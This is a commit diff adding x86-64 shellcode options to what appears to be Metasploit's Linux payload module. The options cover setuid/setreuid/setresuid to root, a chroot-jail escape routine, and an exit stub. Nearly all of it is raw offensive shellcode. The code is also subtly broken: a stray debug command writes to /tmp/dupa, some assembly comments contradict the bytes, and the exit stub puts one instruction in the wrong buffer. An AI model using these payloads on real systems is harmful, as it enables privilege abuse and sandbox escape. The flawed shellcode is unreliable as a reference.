`advance` linux x64 payloads
Maciej Kotowicz
parent
4b814d7da2
commit
fe2caf2fe4
|
|
@ -124,6 +124,7 @@ module Msf::Payload::Linux
|
|||
# build ".." str (ptr in ebx)
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
|
||||
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
# loop changing dir
|
||||
|
|
@ -137,6 +138,7 @@ module Msf::Payload::Linux
|
|||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
`echo "foo size: #{pre.size}" > /tmp/dupa`
|
||||
end
|
||||
|
||||
# Append
|
||||
|
|
@ -203,7 +205,98 @@ module Msf::Payload::Linux
|
|||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
end
|
||||
|
||||
if (test_arch.include?(ARCH_X86_64))
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x75" # push 0x75 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rsi,rdi #
|
||||
pre << "\x6a\x71" # push 0x71 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x6a\x69" # push 0x69 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
|
||||
# setreuid(0, 0)
|
||||
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||
pre << "\x48\x89\xfe" # mov rax,rdi #
|
||||
pre << "\x48\x89\xf8" # mov rax,rdi #
|
||||
pre << "\xb0\x71" # mov al,0x71 #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
# generate temp dir name
|
||||
pre << "\x48\xbf" # mov rdi, #
|
||||
pre << Rex::Text.rand_text_alpha(8) # random #
|
||||
pre << "\x56" # push rsi #
|
||||
pre << "\x57" # push rdi #
|
||||
|
||||
# mkdir(random,0755)
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x66\xbe\xed\x01" # mov si,0755 #
|
||||
pre << "\x6a\x53" # push 0x53 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
# chroot(random)
|
||||
pre << "\x48\x31\xd2" # xor rdx,rdx #
|
||||
pre << "\xb2\xa1" # mov dl,0xa1 #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
# build .. (ptr in rdi )
|
||||
pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e #
|
||||
pre << "\x56" # push rsi #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
|
||||
# loop chdir(..) 69 times
|
||||
# syscall tendo to modify rcx can't use loop...
|
||||
pre << "\x6a\x69" # push 0x45 #
|
||||
pre << "\x5b" # pop rbx #
|
||||
pre << "\x6a\x50" # push 0x50 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
pre << "\xfe\xcb" # dec bl #
|
||||
pre << "\x75\xf7" # jnz -7 #
|
||||
|
||||
# chrot (.) (witch should by /)
|
||||
pre << "\x6a\x2e" # push . (0x2e) #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
end
|
||||
|
||||
# Append
|
||||
|
||||
# exit(0)
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||
app << "\x48\x89\xf8" # mov rax,rdi #
|
||||
pre << "\xb0\x3c" # mov al,0x69 #
|
||||
app << "\x0f\x05" # syscall #
|
||||
end
|
||||
end
|
||||
|
||||
return (pre + buf + app)
|
||||
|
|
|
|||
Loading…
Reference in New Issue